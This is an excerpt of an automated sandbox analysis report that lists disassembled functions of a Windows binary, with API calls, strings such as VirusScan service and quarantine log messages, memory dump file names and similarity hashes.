EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

action, xrefs: 0000000140003020
?, xrefs: 0000000140002FFE
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrt.dll, xrefs: 0000000140002B7E
vseqrtRelease, xrefs: 0000000140002BBA
vseqrtInit, xrefs: 0000000140002BA3
vseqrtAdd, xrefs: 0000000140002BD5

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58
doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
